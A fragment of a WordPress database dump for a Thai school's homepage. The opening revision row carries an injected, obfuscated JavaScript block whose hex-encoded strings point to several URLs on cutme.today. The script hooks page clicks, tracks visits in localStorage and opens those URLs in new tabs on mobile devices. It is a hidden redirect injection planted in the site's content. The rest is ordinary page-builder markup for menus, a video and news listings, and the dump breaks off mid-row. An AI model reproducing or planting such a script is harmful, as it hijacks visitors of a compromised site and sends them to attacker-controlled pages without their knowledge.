-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-26 16:26:28','2024-08-26 09:26:28','',19,'http://watprato.ssk.in.th/?p=219',0,'revision','',0),
(221,2,'2024-08-27 11:38:09','2024-08-27 04:38:09','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1X6Ept6IxYaNET5DErIMExwq1jHu3vOIS/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 